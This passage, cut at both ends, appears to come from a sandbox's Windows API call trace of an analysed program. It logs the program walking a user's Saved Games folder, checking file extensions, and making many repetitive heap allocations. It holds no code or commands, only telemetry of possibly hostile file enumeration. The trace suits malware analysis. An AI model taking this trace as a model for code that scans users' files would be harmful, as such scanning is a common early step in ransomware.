ftLastWriteTime.dwLowDateTime=0xd731c3e0, ftLastWriteTime.dwHighDateTime=0x1d8a217, nFileSizeHigh=0x0, nFileSizeLow=0xc087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzmcSYQ7d6yY4Z.png", cAlternateFileName="ZZMCSY~1.PNG")) returned 0xffffffff [0195.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.283] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.283] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.283] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\") returned="Saved Games\\" [0195.283] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.283] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.283] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.283] PathFindFileNameW (pszPath="") returned="" [0195.284] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Saved Games\\*" (normalized: "c:\\users\\keecfmwgj\\saved games\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.284] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.284] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.284] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Saved Games\\desktop.ini") returned=".ini" [0195.284] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0195.284] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0195.285] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0195.285] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.285] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.287] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0195.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0195.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0195.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0195.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1380 | out: hHeap=0x620000) returned 1 [0195.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1380 [0195.321] RtlAllocateHeap 